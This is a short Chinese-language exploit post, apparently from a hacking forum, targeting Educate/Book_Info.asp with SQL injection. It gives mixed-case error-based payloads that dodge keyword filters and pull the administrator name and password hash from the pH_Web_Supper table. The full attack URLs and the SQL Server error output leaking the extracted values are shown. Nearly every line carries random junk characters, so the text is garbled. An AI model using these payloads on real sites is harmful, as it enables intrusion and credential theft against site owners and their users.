漏洞出现在Educate/Book_Info.asp ! }% o' s6 D2 A( [) `. }6 j" G% M
1 h" `' N$ W/ E& f6 `$ i此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出7 [' P+ f- P: Z% d6 y# r1 i
- J7 n- w3 [2 o1 r( aexp:如下
5 h' ?: i- N7 R( |3 ?. ]查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
$ I+ f* G6 b; S: M查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)+ {$ j9 l' o1 n5 k0 D# K
6 K1 X u( `! o& ~
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 J6 D4 n! H+ Y% x' }; V4 i
5 i Z9 Q$ m: ~! w- y* q. I9 ?4 ^$ mMicrosoft OLE DB Provider for SQL Server 错误 '80040e07', l2 ~1 u4 T0 E
) @+ T8 V S% x9 B# ]2 u
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。" F8 S+ g2 L, |0 J# w+ l+ o0 l6 d
$ {" \9 f9 y: \
/Educate/Book_Info.asp,行 8
! G/ j& M0 \6 S
; o( h7 r1 g" yhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 ^4 I' `8 M6 u$ O4 a" W; ^& p- ]
F' w6 e3 j w7 u- `; O: G' w
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'; Z% H! L' f( k! T1 O8 R
. t2 m2 f9 [' K N+ h) N
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
% T, v0 M% `7 j $ l9 [! X `, \8 q
/Educate/Book_Info.asp,行 8
9 e) M x n3 Q6 A* C |